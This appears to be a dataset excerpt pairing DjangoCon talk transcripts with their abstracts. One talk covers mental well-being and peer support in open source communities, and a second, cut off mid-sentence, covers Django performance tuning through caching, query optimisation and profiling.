doi
stringlengths 17
24
| transcript
stringlengths 305
148k
| abstract
stringlengths 5
6.38k
|
---|---|---|
10.5446/32699 (DOI)
|
Come on, yo! MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC So, I'm going to talk to you today about healthy minds in a healthy community. So, as I said, my name is Eric and if you've seen me online, you might recognize me as the Shippet Squirrel instead, my avatar on GitHub. It was mine before GitHub made it into their emoji. So, I'm also a general co-developer. This is my first ever trip to the US and the furthest and longest I've ever been away from home. My friend, Mikey Ariel, she's not here. Your eyes do not fool you, but we basically built this talk together for general in Europe. I'll be coming back to that process a few times also, but it really would not have existed without her. So, this talk has a mix of stories that are mine, that are Mikey's and there are also many other community members and friends that share their stories with us and that made it into this talk. So, I do want to ask everyone that what's this talk or listens to it later or reads the transcripts to keep in mind that the point of this talk is to help trust and openness and we're going to touch on some sensitive issues. So, I would like to ask you to handle whatever is shared both by us and by maybe people later that have more courage to share things now with care both during and after. So, the first thing I want to talk about is how none of us are alone. Because with so many people I meet, both here and in so many other places, I feel like they very much have their life together and they tell the meal about all their wonderful work and how they seem to get along with everybody. And I've seen all these amazing projects that over amazingly and there have never a problem and everything seems entirely smooth sailing for them. But over the years I found that when I get to know some of these people better, they open up to me and I find out how wrong I actually was about them. Because for many of the people that I admire the most and sometimes even envy the people that seem to have everything together more than anyone else that I ever know I was wrong. Because once they open up to me I hear stories of depression, of anxiety, of old-sity, PTSD, or sometimes even self-harm. And I felt completely blindsided again and again about how serious some of these stories are and makes me feel even more impressed about what these people have still achieved. But it's left me increasingly thinking that I probably actually know very few people that have never started with their well-being. And it's just that many of them have never felt, never wanted to be open with me, which is of course fine if that's their choice. But it's taught me that no matter how successful someone appears and how amazing their work might be and how well it might be going and they have endless creativity they may very well be spending tremendous amounts of energy just to get through daily life. And it isn't uncommon because one in four people roughly will experience at some point in their lifetime mental illness. So that could be things that are with you your entire life, like a development disorder or things that are later like burnout, OCD, or depression. And then once it shows for some people this is something that will affect the nurse of the life for some it is something that with help they can deal with fairly quickly. So there's a lot of variation in those experiences but about, but one in four people will go through that experience during their life. And that might still be a minority but there are many other people who struggle with their well-being without necessarily qualifying for a mental illness diagnosis. So for example 70% of office workers regularly experiences physical symptoms due to stress, which means that due to their stress level they are excessively tired, had a neck pain, a very typical sleep problems, things like that. And so they might not always meet the bar for a diagnosis of mental illness, but especially in the long term such high stress levels are very harmful to our health. So even when a minority might have an actual mental illness diagnosis a large majority is or will be suffering from issues that affect their well-being and have an impact on their life. So let's do a little lesson in Dutch. How gaat het? Means how are you? And the answer in Dutch to this question is goed, which means good. So there's no actual question of how you actually are. When someone asks you who had it in an illness that doesn't mean they want to know how you're doing, they just want to say goed. And this is like, this is very typical in many of our cultures. It's like saying I'm fine, I'm just tired, which is also sometimes true, but it's also something we often use to hide our issues and just say no, no, I'm just tired, it's all fine. And hiding our issues is just very common. But the reality of it is that there are other people in this room that probably have the same struggles. I know that there are people in this community that are struggling and sometimes it's a lot, sometimes it's a little. And some of these people I know and I've heard their stories, but there are many that I have never heard. But it's definitely convinced that if you are struggling, there are other people in this room that know exactly how you feel. And there are probably some people in this room that suffer from depression, someone with low self-esteem, someone with an eating disorder, social anxiety, self-identity issues or anything else. And even if other people here don't necessarily have the same experience as you, they might still understand because they know what it's like to struggle. So I don't know exactly who all these people are, but I know that they're here. So at GeneralCoin Europe 2015, there were free counseling sessions which were available to all attendees. And one in 10 attendees used that service. So you could pick a time slot from a board. It was completely anonymous. You did not have to say your name. You didn't have to sign up anywhere, no emails. And so you got 25 minutes with a counselor to talk about whatever you wanted. And 25 minutes is not enough to do any treatment of serious mental illness, but it can help a lot on getting people on a path to feeling better, to give them tips on how to do better self-care or help guide them towards more extensive professional help. My favorite two bits of feedback from those well-being sessions were someone who said, it's been a relief to finally say these things out loud and have acknowledgement of the problem. And I found it useful and relaxed. And I feel like I'm not crazy or alone. And this is normal. And they reflect very well how people generally thought about these sessions, not as an immediate fix to all your problems, but a place to say things out loud, not be afraid that you'll be judged, and feel validated and acknowledged that the issues they're experiencing are real. Even if they might not be the same as those of other people, or you might feel they are less serious than those of other people. And that's also what this talk is basically about. So I'm not a trained mental health professional in any way. So I can't treat someone's eating disorder. And after this talk, and with several of the projects I'll be announcing, I can't solve someone's anxiety completely. I can't remove stress insecurities. But like short counseling sessions, even though I'm not a professional, and even though you're not a professional, we can all make a difference. Because that we includes you, and that is all of our community. By being considerate, empathic, accepting, and understanding, and helping anyone who struggles to feel validated and not alone. Because none of us are. And whether it's struggling with serious, multiple, complicated disorders, or sometimes just feeling like the stress is taking a toll on you, those struggles are valid because they're impacting our lives. And know that whatever you're struggling with, you aren't crazy, you aren't any less lovable. And most of all, you're not alone in our community. So now that we know that we're not the only ones struggling, and that these aren't unicorn problems, let's talk about some of the first steps we can do to help ourselves out of whatever's troubling us. Because the last thing many of us ever want to do is to admit that we're struggling, that we can be overwhelmed, and that we're not superhuman. But how do we end up overwhelmed? Because most of us are responsible, mostly functioning adults. But yet it is so easy to end up in a situation where we're constantly fighting against ourselves and balance all our work and all our tasks and projects, conferences, hobbies, friends, and in the end sometimes sleep. And most of us are probably generally like people value contributions in our company, and a lot of contributors, including myself, get a lot of satisfaction from participating in projects in our community. But that is exactly also where the problem starts. Because somewhere along the way, we sometimes forget that we need to help ourselves before we can help anyone else. So before whether it's being excited about a potential project, an invitation to speak at a conference, to organize a conference, or workplace increasing your workload because you are the rock star that can do absolutely everything, it is so easy to get caught up in a desire to contribute and to help and to be a part of things that we lose control over our own time, energy, and mental resources. And that is where things get dangerous. When I forget that in the end, my participation is supposed to create a positive impact, not just on my peers, not just on my community, or on the rest of the world, but most of all on me. When I forget that, then being helpful does not help me. So if that sounds selfish to you, consider that putting yourself first is not always selfish and could even save lives. So if you've flown an airplane before, you might remember the oxygen mask where you should always put your own mask on before you help anyone else. And that is because if the person that needs your help passes out, then you still have time to help them. But if you help someone else first and it doesn't work, then you all pass out and nobody can help anyone at all. So in other words, if you take care of your own well-being first, there's probably still time to help others. But if you forget to take care of others first, and only focus on others first, you might run out of air before you can help anyone. And I myself also at risk of over-commitment because I get really excited about things and I want to participate in everything, or I'm invited to participate in something and then I feel valued and validates for it, which makes it hard to turn on product offers or step down from something that I've already joined. But why is it so hard for us to say no to a product? And why is it even harder to say no more? But we need to step down. From my own experience and from what I've discussed with many others, I have two main reasons for this. One, being afraid that if we turn down or step down from something, it means that we're failing. And second, that people might respond in a negative way. So how can we address some of these fears and gain some confidence that we need to make these decisions? When I asked Mikey to help me build and present the first version of this talk, she had just changed careers for the third time, moved to a different city, moved from her office work to home office work, and she had a million other projects going. And at some point I confronted Mikey with what was in her own words she should have confronted herself with. She was dropping the ball on this product and she was risking the entire collaboration because she was trying to juggle way too many things. Unfortunately, we're very good friends and we were building a talk about well-being, so we have a good productive conversation about it. And so she was able to admit that she had a problem and had to make really tough choices about what's to come because she could not keep going with all the projects that she had. So fortunately she decided to keep building on this project, which is why this talk exists now. But we have to remember that sustainability isn't only important for open source projects but for the open source servers too. And that might be simpler than you think because if I burn out, I am useless to everyone including for both myself and to others. So I cannot let short-term satisfaction or validation impact my long-term capacity. So now you looked at your project commitments and as your free time or whatever is left of it and you realize that you must really balance your life better. Now you need to communicate as with your peers, which brings us to the second reason why saying no is hard because what will people think? Unfortunately even after you admit to yourself that you need to trim down on your commitments the next step of actually communicating this can seem like an even bigger hurdle than admitting this to yourself. So if we look at long-term open source servers, sometimes this is even scarier because we spoke to several veteran contributors who feel like the project has become so dependent on them that they are essentially trapped in their roles because the project might fail if they leave and they cannot let the community down. But humans are social creatures and most of us work at jobs where there is not really a finish line. It is more an ongoing, always developing, it is never actually done. That makes us very dependent on consistent subjective feedback from our peers and that's combined in a culture that encourages overachieving and overcommitting means that it's not strange that some of us were afraid of saying no or no more. So when I wrote Mikey about my concerns about how she was handling our project that was not an easy thing to write because I was very annoyed with how we were going. I was annoyed with that we weren't making any progress, worried that the whole project was going to fail after we already put months of work into it. But I know her quite well and care a lot about her so I could be sure that she didn't do this because she didn't care about me or about the project because what we do isn't always what we are. So in a community of volunteer contributors, which could be thousands of people on an open source project or two people building on a talk, being volunteer means that nobody has to do anything. We are doing this because we want to contribute because we get and get a lot of value doing it but this is all at will. It is even more so than our jobs. So if we suffer through our projects through our conferences or responsibilities or if we have left building this talk damaged our own well-being then there would be no love in the creative process and we would not be serving anyone least of all ourselves. It doesn't matter though how many times people tell me it's okay to step down. People will understand. Just be honest. It's so easy for me to dive into the countless imaginary scenarios of what it would be like if I took that step and most of those imaginary scenarios don't actually involve much understanding or acceptance. It's so easy to come up with so many imaginary scenarios of people not accepting and not understanding but if I actually look in reality both in my own experience and what I've heard from anyone else it's only been met with kindness and understanding. So our fear of the unknown is so much more destructive than the actual consequences of our actions. And even if some people might be offended or it's not bad to you choosing for your own well-being that is more indicative of their own fears and their own insecurities as it means they will need to make adjustments too. If we accept that we can only be helpful if we can retain our own health and balance then we can face our fears with confidence that our action won't just help us but help the project or the community because it also makes space for someone else to step in. If I stay in a role that I can't actually fulfill then it is as if I am licking the cookie but not actually eating it. There is no space for anyone else but I'm not doing it either and everyone ends up suffering including the project. And you might think that if you just love your produce enough and that if you just care about them enough that will just conquer all and then it's all fine. That if we truly care we wouldn't have these issues. But that is absolute nonsense. It's not how it works. Love doesn't conquer all and it doesn't matter whether it's for people or for produce or for communities you always have to help yourself first. So please remember to put on your own oxygen mask first otherwise you will run out of air before you can help anyone else. And it might be taking a moment to think about whether you actually want to join a potential project or taking some moments to figure out which of the products is draining your energy too much and needs to be let go. And don't let your fears paralyze you from taking care of yourself. And that might sound easy but in practice there are a lot of patterns in our community that tend to push us further towards our commitment. But for our long road being of our community and the people in it we have to recognize and tackle these. So my favorite is the Ghetto Contribution Graph as it was. They fixed this. So this was my Ghetto Contribution Graph before I first presented this talk and this shows that I must be an absolute useless slacker. It's like I have like 10 contributions in a time 17 contributions in a whole year. My longest streak is a single day. But of course though this doesn't actually accurately reflect my work. I also do a lot of work in private repositories. GitHub recognized this and they removed this whole bottom part and they allowed you to publish private commits as well in here. So mine is now a lot more full but my weekends are still empty which I think is good. Some people I also made some, generate some attention around this thing and some people get very offended by this being removed. Someone called me a neoliberal, emotional jihadist. So that's really interesting. Yeah, people are very attached to that. But yeah, this saying to people will reward you for giving you a bigger number if you just never take breaks. That's for me a very bad way to push people to over commit. A really good example is the Degenerate Solar Foundation for the Commit Committee who just published their documentation which says each member is only obligated to serve for six months being a default term and then you can step down without feeling guilty because like your term has ended so you are done. You can opt in again to continue but the default is that you will stop after six months and no one can look bad at you for that. So it's a really good example of how we can help people to step down in time. It's something we should probably adopt in many other places. Next I'd like to talk a bit about asking for help. Because asking for help can be really hard, I know very well myself, but it's always okay to ask for help. Asking for help isn't just difficult when it comes to well-being. So later this week we are doing sprints and we found like I'm a pretty experienced contributor being on the core team but I found that sometimes people are so reluctant to ask their questions that when they get stuck, especially people who are shy, who are new to our community, who may even have social anxiety issues, they might be so hesitant to ask a question that nobody will help them when they are stuck and they just have a horrible time with sprints. So at the Jang-O-Ner-De Hood sprints last year, we told people that if you see anyone with a sailor hat, you may disturb them anytime and ask them absolutely anything. They might not hold the answer but they can help you find it and if it's their wearing hat, you are not disrupting them from anything else. They are not doing other work that's important. They will not think you are silly. And that works really well because people with questions have know that these people wearing hats explicitly ask to be disturbed and it also works for me as an organizer because when at a moment being helpful doesn't help me, I can take off my hat and I won't be disturbed anymore. So it works really well for both the people who have questions ask the people who answer questions to remove some of those barriers. When I first started thinking about this talk, which was just after Jang-O-Ner-De Hood 2015, I had a lot of very incomplete ideas. I had this random collection of ideas. Some of them are still in the talk today but there was just something missing. It wasn't really going anywhere. It just wasn't enough. I couldn't figure out what the missing parts were and so I was pretty stuck. So a few months after I first thought about this talk, I met Mikey at a conference and we quickly became friends and I was still struggling with the talk. When somebody emailed her and said, I have this half-assed idea for a talk, it is absolutely full of holes and this is either my best or worst idea ever. So here are some random incoherent ideas. I don't think I can do this on my own and it's also pretty scary so maybe you want to join me and build this talk together. So that was basically all I had when I first approached Mikey. And a few months later she was very enthusiastic so a few months later we started working on our appropriately named GitHub repo. What it comes down to is this, if I had not asked Mikey for help to work on this talk it would never have happened. I would not have been here. I would probably not even have been at this conference. Sometimes asking for help can seem like failing like saying, I cannot do this on my own. I need someone else to help me with this. It could be a talk you're trying to build. It could be a conference you're trying to organize. A new feature you're trying to build in Django or how to deal with your workplace stress. It could be feeling unwelcome in this community due to social anxiety or needing more quiet time because having a lot of people around you exhausts you quickly. Asking for help does mean admitting that you have difficulty doing something alone but that is not the same as failing. It is in fact quite the opposite. If I would try to organize a conference on my own I imagine it might literally kill me. So either I do it with others and I ask for help all the time and I offer help to my teammates all the time. Because otherwise there is no conference and that would be failing even worse. So if I would have tried to do this talk on my own and had never admitted that I can do it on my own then there would be no talk. So I would only have failed if I would not have asked for help. And when we struggle with things it is so easy to pretend to stick your head in the sand and just pretend they don't exist. Austria just don't actually do this. So it means you don't have to deal with them because they don't exist. And that could be anything from starting with self esteem or having more serious well-being issues that are much more threatening and require professional care. Asking for help can also be hard because when you ask for help you are making it seem more real and it is tempting not to do that. And some people do that for years or decades and keep harming their health in the meantime. But depression doesn't start when you go to professional and panic attacks are real even if you hide them from all your friends successfully. And it may or may not meet the criteria for diagnosis but stress that is harming your health is still impacting your life. So if you are not well and that is impacting your life those issues are already real. They are real whether you talk to your friends or not, whether you seek professional help or not, or whether you try to ignore them. So what you are doing when you are asking for help is not so much making these issues more real but you are taking responsibility for helping yourself because it is okay to ask for help. And when you are suffering from well-being issues it might also occur to you that some of them don't or a lot of them even don't really make any sense which is really confusing and also frustrating and can make you feel like you don't deserve any help. Like basically it is all in your head which it is sort of. But yeah, you can feel like you just need to think your way out of it. This is just silly. So for some people everything in their life is going really well but still they feel very depressed and maybe the workload isn't that high objectively but still it costs a lot of stress for you. You might have friends and people might generally seem to like you so there is no need for you to feel out of place and inferior and anxious but still you might do. But to ask for help those feelings don't actually have to make any sense. Our minds do not behave rationally, emotions aren't very rational and the things you struggle with don't have to be rational and often they are actually not. What makes it okay to ask for help is that you are experiencing them and that they are affecting your life and that's all you need. Asking for help can also be very scary because others might judge you, they might make fun of you, they might ridicule you, they might say you are silly for thinking that. When I asked Mikey to work on this talk she could have told me that this was an absolutely ridiculous idea and that I was an complete idiot for thinking this might remotely be a sensible idea. But in my experience such responses are really, really rare and I've never actually personally had it happen to me in this community. But if you do reach out for help and someone makes fun of you or ridicules you or claims that you are just being dramatic and you just act like a grown-up it still doesn't mean it was wrong of you to ask, it just means that this person is toxic and that they are not your friends. And it might also be a violation of the code of conduct so if these things happen, please support it, feel free to reach out to me too. Personally I also have no idea how often I've asked for help and I know I will be doing it a lot more times both in this community, from my friends, from Pierce and other communities sometimes it's with code, sometimes it's with organizing something and sometimes it might be developing a new idea or when I'm not feeling well. And I can tell you that even taking into account everything I've just told you about why it's okay, which are all things I very strongly believe in, asking for help can still be very hard sometimes. Even when I know it's not failing, even when I know that it's okay if things don't make sense to me, and even when I know that the other person is probably happy that I trusted them and asked for their advice. But in reality I've almost never regretted asking for help and it's almost always been a massive relief once I actually pushed myself to do it. So don't expect that asking for help if you remember these things will suddenly make it easy and trivial but if you're not sure, if you're in doubt push yourself a little more to open up a little more. And this community in particular is a really great place to do this because it's filled with the most positive and caring people that I've ever met, which makes it one of the best places to ask for help. And that brings me to talk a little more about helping in communities. So far I've focused a little more on how as individuals we can help each other and others. But now I'd like to talk about how the community as a social and professional entity can provide support to our members. So as a collective the general community which we've also seen at this conference with many talks is paving the way with many activities and endorsed projects that have a very positive impact on the productivity and well-being of both our community and other people, which makes our community as a whole more healthy. Some of the good examples in our community already are the general fellowship program where we created a paid position which is directly supported by and funded by the community where the fellow takes on important tasks without having the burden of a full-time job. Because this is very common that open source contributors do this next to their full-time job. So the fellow doesn't need to worry about that. They have a paid position from the general software foundation. And that means in paid contributors which is still most of us can focus more on things they actually enjoy and reduce their risk of burnout a bit. The general girls program could of course not have been successful without the overwhelming positive attitude of both organizers and mentors which makes a huge difference in how newcomers into our community perceive and how they are received into our community. Which again makes our community healthy and happier as well. And having counseling in Europe was a much more direct step to reach out to community members and invite them to talk in a professional environment about their thoughts and feelings. That's not something you can easily do in many places. But also that is not always what is needed professional help. You might have seen recently a internet comic which is very sweet and very powerful called How to Care for a SAC person which shows, this is the last step, which shows how you could support someone who is not feeling well without necessarily fixing all their immediate problems. Because sometimes all we really need is someone to understand and not judge and give us a metaphorical or physical hug. And that is something where our community can make a difference and also where you can make a difference. Because like I said there were a lot of horrible ideas that never made it into the talk. But there was one which I am very happy with that did, which is the General Software Foundation Wellbeing Committee. This is an idea that came up when we were trying to think of ways in which the community can support members in a more structured way as part of a global ongoing thing rather than individual counseling sessions for example. The DSF cannot of course provide professional help on an ongoing basis so the idea of this committee is to provide a formalized peer support network where general community members can consult with other community members about anything from work life balance, burnout, self esteem, anxiety, depression and so on. So we actually announced this plan some months ago at General Green Europe and I hope that we would have actual much progress now but we haven't made much yet. Because we had other priorities and it seemed a little silly to have building the Wellbeing Committee affect my own wellbeing. But it's still very high on our list and I'm probably going to focus on this during the spints and we still have a lot of details to work out because of course one of the points of attention is how do we protect the wellbeing after the members of the wellbeing committee. But at least we do have preliminary approval and support from the DSF boards to place this under the General Software Foundation. And the mission of the committee would basically be to provide peer support for community members that needs to talk to someone who understands. Because I often find that just being able to talk to someone else who's experienced some of the same issues that I have especially people who are familiar with tech and open source can be already a massive relief. When we say peer support you can think of projects like Big Brother or Big Sister or Alcoholics Anonymous where people who are not professionally trained provide basically a way to support others. So it would be a baseline communication channel that other people in the community can use to express their thoughts and feelings in a safe environment. And what we're hoping for is to help people get past some of their initial fears like that nobody understands and how problems don't make sense. And if needed help it will make the staff to professional care easier by making people feel more validated. So some of the topics that we've been thinking of are based on the themes that are very common in general from Europe counseling are these but of course it's not an exhaustive list it also depends on who we can actually find for the committee. Which so far is myself, Mikey, Daniela Prasida of the Dyinger Sovereign Foundation Board will get us started on behalf of the DSF. And at this point we'd also like to call for any people who are interested in exploring this yet unknown territory of formalized peer support in open source communities. If you have already responded after the journey from Europe we haven't forgotten about you we haven't had enough time yet. And also remember that this committee is set up to help the community with wellbeing issues not create more wellbeing issues. So also consider your own wellbeing and your participation. But if you're not sure you send us an email I will have an address later and you won't be committed to anything. And also keep in mind that peer support is not a substitute for professional help and so we'll also have to make sure that the committee members take care of their own wellbeing first so we may not be able to help everyone. But that's not always what we need it because sometimes you don't often you don't need to be a healthcare professional to help someone feel like a happy little sushi roll and that's basically what we're trying to move forward with this project. So I said before that no matter what you're struggling with that doesn't make you any less lovable. But in general most people both in our community and outside of it don't actually feel as loved as they are. So I'm one of the organizers for Dengon Rude Hood which is an in-depth Dengon conference with 300 attendees in Amsterdam. And basically my task in a team is dealing with Dutch people. And there's probably a number of people in this room who can tell you that organizing conferences especially with volunteer teams can be really stressful. So there's venues, there's speakers, there's sponsors, tickets, budgets, food, party, hotels, flights, communication on your website, your social media, artwork, posters, supporting attendees and code of conduct and much more. And there are always things that almost go horribly wrong during the conference that are quickly fixed behind the scenes without anyone noticing. But of course adding to the stress level of organizers. Now for me the conferences are fairly short and I'm doing this in a team that supports me also. So even though it can be very stressful I feel like it's something I can absolutely deal with. And I also feel like when I can't there's space for me to step back and for other people to cover things for me. But most of all, all the stress that organizing a conference involves and all the effort that it requires, all the things that almost went horribly wrong, the number of times we accidentally locked all our attendees into the conference room, they are all worth it for me and I mentioned for many other organizers when I get an email like this. I feel totally overwhelmed, surprised and very, very grateful. Thank you for caring. You are unbelievable. You are a bunch of the craziest, the most positive people I've met. You inspire me to get back to the community even more. I wish I could express properly what I'm feeling right now. May it always rain straw bottles on you. But not all the time, that could be inconvenient. Or may it feel like having straw bottles. Or someone that you like feels like having straw bottles. Or you just want to make it rain straw bottles. Sending hugs. You crazy amazing people. If you don't know what straw bottles are by the way, I have some here which I'll be ending out later. So we got this email from an attendee. They ran into some kind of problem. We were able to help them as organizers with our resources. And this was not nearly the only email or tweet that was like this. And for me, being able to help people feel like this is why I love organizing conferences and other things in this community. So if you've ever organized events or done anything else that is a high stress situation, you might also know that your team is everything. Because it's so important to feel like you can ask for help and that you can start back even if you never have to just to know that that is there. Because even when we need help and even when you sometimes need to start back, when we sometimes flake with our work, when we make mistakes, we are probably much more appreciative than we think. Because this community is full of friends that are loving, caring and supportive. And that's why I'm still here myself. And almost all of us sometimes flake and all, frequently all of us make mistakes. But our community is here to support us when that happens. So in the Jamming community, there's already a lot of good work in that area by having for example posters that try to create a bit of positive atmosphere in which people feel welcome and feel like they're part of this with a slack channel so that people who might not know anyone here and might be anxious to talk to people can find connections with other people and maybe find things to do. And so we try to bring part in this community already to make everyone feel that they're part of this and that we are very happy to have them here. But unfortunately, reality is still very often like this where we don't feel like we need to tell someone when we appreciate their work and we're happy with their contributions that are much more vocal about dislike of someone else's work. But the feeling that you're making a difference and that your work matters and has value that the people you work with are happy to work with you is really great feeling and it's not only great, it is really important because it makes us feel like we matter helps, may helps us feel like we are making positive change and it gives energy. So whether it's writing code or supporting DSF, fixing the general docs or helping to build events which are small or large or anything else, feeling that you've made a useful contribution has also especially huge effects on people that struggle with self esteem, that might be struggling with burnout or anxiety or anyone even leaning towards those a little bit which applies to so many of us. And I can certainly say for me that seeing emails and tweets like the one I read out makes a huge difference and we feel that our community would be an even better place if there would be more of that because we don't always let people know how we feel and how much we care about them. So with that in mind we built open source happiness packets because the thing is openly expressing appreciation gratitude or happiness to other people can be really difficult especially when you don't know them very well, many of us come from cultures in which people are not open by default about such feelings and you might naturally feel uncomfortable or even a bit creepy sharing things like that. So, happiness packets is a very simple platform to anonymously reach out to people that you appreciate or that you are thankful to in this community. We can make messages anonymous but of course we encourage people to share who we're there from but if you really don't want to, you don't have to. So far we've had about 170 happiness packets sent, some of them are published on the site if both sites can send a receiver and sender then we publish it on our site and we are really excited to see where this will go and also where we can take this together. And I'm fairly sure everyone in this room can think of people in this community that they are grateful to that they admire, that have done something for them and so I want to ask you to try to send, to find two people to send a happiness packet before the end of the conference. And I know how awkward it can feel a little at first but I guarantee you you are making a huge difference to both yourself and the person sending it to. But don't take my word for it and a number of people already see the system and tweeted about it so Katie who's not here wrote about how she woke up to a happiness packet and it was the absolute best thing. Anna wrote how receiving her first happiness packets put a huge smile on her face and she was recommending anyone to send one also. Lacey co-chair here described it as an amazing fuzzy feeling that makes your day. And my favorite is from Ola who wrote that she got the Jeremy Yerbka happiness packet and it made her tear up at a bus stop. So this is the effect you can have on other people and also it creates a little positive vibe for yourself. I have happiness packets I have 500 so I think this should be enough. So find me to get some stickers. They are also you may have seen them spread around the venue. They also fit exactly on the mini store bottles that I brought. But the stickers aren't edible so don't look down and don't forget to also send some happiness packets yourself. So I always paid it. First of all the thanks go out to Russell who is conveniently over there and Amber Brown who we interviewed as the early research of this process and who inspired various of the concepts in here. Ola Sitariska built the entire design for happiness packets and I will show you how it looked like when I designed it. Daniela Pashida helped us to get started from the DSF board with the well-being committee. Of course the organizers for giving me space to talk about this and there are tons of other people among our peers and friends that contributed knowingly or unknowingly to the stock. So send your own happiness packet on happinesspackets.io We are on Twitter as happiness packet because you can fit happiness packets into a Twitter name site in this plan there. Send me an email. This goes to both Mikey and me if you want to join the well-being committee and help us build the support network. We don't actually take support requests yet because we're still working on the foundations but there will be announcements once this actually is running. We also found a lot of other resources while working on this which in no way fit in the stock but there's a public GitHub repo where I also just push the slides to and there are also a lot of other resources there around well-being. Feel free to contribute your own resources as well and also the slides in there. And the last thing I want to leave you with is to always remember that wanting to be happier never makes you selfish, negative, or ungrateful because you deserve to be as happy as you can. Thank you very much. applause music music music music music
|
Open source communities attract and boast passionate, idealistic people, and many of us invest copious amounts of time and effort to contribute to our projects and support our communities. This underlying emotional attachment can make us more vulnerable to elevated stress, burnout and conflicts. And then there are those of us who also manage mental illness. More often than not, we suffer these struggles in silence, feeling (and fearing) that we’re alone in our trouble. Here, our communities can make a huge difference, by building a positive and safe environment where we can blossom and support ourselves and our peers, and feel included. The community around Django is already very mindful towards inclusivity, and keeping an eye on the well-being of community members. We have recently launched several new projects to further promote the well-being of our community members. This talk will take a look at open-source communities through the eyes of various mental well-being issues and struggles, and discuss and report on the progress our new initiatives. Hopefully, this will help foster healthy minds in a healthy environment.
|
10.5446/32700 (DOI)
|
Come on, y'all! So today I'm going to be talking about basically the performance issues that we dealt with at the Atlantic over the last year, how we overcame them, and some of the things that we learned on the way there. So I'd like to start off by thanking the organizers of DjangoCon for taking interest in my proposal, all of you for coming to listen to it. And I think one of the most valuable things about this conference on par with the talks and the events is the opportunity presents to meet and talk to some really smart people. In fact, the work I did in the past year would eventually became this talk, was thanks to a conversation I had with one of the founders of OPI. And if you're not familiar with them, they're a service for monitoring performance of web apps, similar to New Relic, but with a special focus on Django. At the time, in September of last year, we were struggling with growing pains in our Django application. We had just completed a huge project, the porting of over six years of legacy code, a mix of PHP and Perl, to a Django-powered CMS in front end. There were a few performance hiccups at launch, but we eventually overcame most of those, with one important exception. Our servers basically melted when we deployed. At the time, we were using modWiskey, so our process was basically to see up the code using a fabric script and then touch the whiskey file. Today, as you can see, and you're reading that correctly here, 80 second response times and now down to 150 milliseconds. I'm going to first cover the things, there wasn't one single thing that we did that addressed our performance issues. It was a bunch of small things, a couple things that were actually low hanging fruit that were great wins, but in general, it was a bunch of small things that build up to fixing our performance problems. The first thing is monitoring and profiling. If you don't understand what your bottlenecks are and you don't understand where the slowness is occurring or where the app is freezing up, then you're just sort of stabbing in the dark. I also think it's important to tackle the easy stuff first in quotes here. Query optimization and caching are sort of pretty easy ways to get quick wins with the application. Also, this talk is very focused on the server side of things, but it's important not to neglect front end performance as well, which is like a completely different ball game, but you can have a super fast server and still your JavaScript takes 20 seconds to load and nobody visits your site. So for profiling, we found the most use with hosted services, New Relic or Op-Beat are both comparable and great services, and we identified a number of really important performance issues in our site with those. Also, everybody I'm sure is familiar with Django Debug toolbar. I recently came across Django Silk, which seems like a really promising application for sort of a different way of profiling your Django application. And if you're a masochist, you can always try Cprofile, PyProf, toCulture, and Kcashgrind. And also, there's some whiskey middleware, which I've had mixed experience with. There was like one bit of code that I was able to like kind of figure out where things were going wrong with that, but it was really difficult to set up and probably not worth the effort. Monitoring, there are downtime notifications, some of them hosted a lot of the same services that provide performance monitoring, New Relic, Op-Beat, and then also a Lurtrin, Chartbeat, provide the service as well. And then you can have self-hosted services like Nagio, Centrumany Forks, and also others like Zavix. So with the easy stuff, caching, using a CDN, we, at the time that we launched, we did have a CDN that we weren't using our cached headers properly. And so kind of being really strategic about where we said what to vary the cache on and when and how long to cache the page, particularly for archival pieces, really helped us with some of the traffic we got from crawlers and bots, which is the majority of the traffic that gets past our CDN. It's important, I think, to have a proxy cache, whether it's Nginx, Squid, or Varnish, we use Nginx, and we've had a great success with it. One of the really great things about the Nginx proxy cache is you can actually set it up to just cache for five seconds or two seconds, but to hold the information in the cache as long as there, until there's a 200 response. So if your application goes down, that two-second cache key will hold up until your site comes back up again. We've had this really save us, like, you know, somebody deployed some bad code or there's an issue with the database and the site, nobody really realized that the site was down, because we had this two-second cache that basically lasted all night. Also with caching, the stuff that comes built in with Django, like the cache template tag, at cache property, cache static file storage, the cache, the information about where the static files are located on the file system, and the cache template loader, which does the same thing for the template finder. Page caching frameworks, we actually have one that I thought we had open sourced, and I realized today that we have it closed sourced for some reason, so I talked to my co-worker and we're going to open source it called Django CacheCal in the spirit of sort of punny, stupid names for Django projects. It's kind of loosely based on Django, which hasn't been updated in three years, and still is as alpha, so maybe it's an improvement on it, but there's also, you know, a number of really decent page caching frameworks. O-R-M caching, like Django Cache Machine, I feel like is a mixed bag, and I'll actually get to that in the next slide. So for query optimization, there's the obvious stuff, like prefetch related and select related. Prefetch related objects, which is in 1.10 public, though it's accessible in earlier versions of Django, that allows you to pass a callable and filter the objects that you prefetch on, so that you can prefetch conditionally items in the query set. For instance, in a generic foreign key, you can prefetch all of the instances of one model, this field, and not have to worry about it conflicting with other results in the query set that might be from different models that do not have that field. Dot values and dot values list, I found this really surprising. When you're profiling Django, one of the things that we found to have like a huge impact, but which doesn't really show up in any profiling, is model instantiation and hydration, because, and this is what ties back until like Django Cache Machine. We had a query that basically we stored in the database, we had all the different ad slots on our site, and then the breakpoints that they were enabled, and the sizes of the ad units, and all together with the prefetch relating and the, you know, select related, this amounted to I think like 700 instances being loaded into memory on every request, which came out to about 80 milliseconds, 100 milliseconds per request. When we switched this to just dot values and, you know, manipulated a dict, basically simulate the prefetch related. Like I said, 80 millisecond drop in every request. So that was like a huge gain, basically made our response times about 25% faster at that point. And then obviously, you know, but much more difficult database parameter tuning and judicious indexing. And you can always throw more hardware at the problem that was, you know, part of our speed gains there was cheating. We upgraded from like four year old servers to brand new servers that ran, you know, twice as fast. So, you know, that cut our response times in half. Now, you might notice from the earlier thing, the only thing in this chart is request queuing. What is request queuing? So to explain that, I'm going to rewind a little bit and just kind of talk about how we were set up. So we had, I think, what's a fairly standard way of load balancing a Django application. We had Nginx in front of it as a proxy cache. And then we had a couple of application servers. In this case, they were running modWizgi behind it. The Nginx was listening on port 80. And then we had the different applications listening on different ports and defined upstreams in the Nginx config across the different app servers. We also had a stage version of our site which we would use to test out code and production on the production environment. And we just had like a different port for it. So, you know, our directory structure looks something like this. The discussion I had last year at DjangoCon with the founder of Opet, you know, so I was explaining to him this problem we had. We would load everything up. We would try and freeload as much as we could. Then we would touch the Wizgi file and then kind of cross our fingers. And if we were, we happen to be slammed by a bot at that time. The site, all the code that it took to load. On our local dev machines, just loading up one worker process, it would take maybe 10 seconds. But on the server loading 40 workers simultaneously across, you know, 5 VMs, which are all actually sitting on three bare metal machines, this 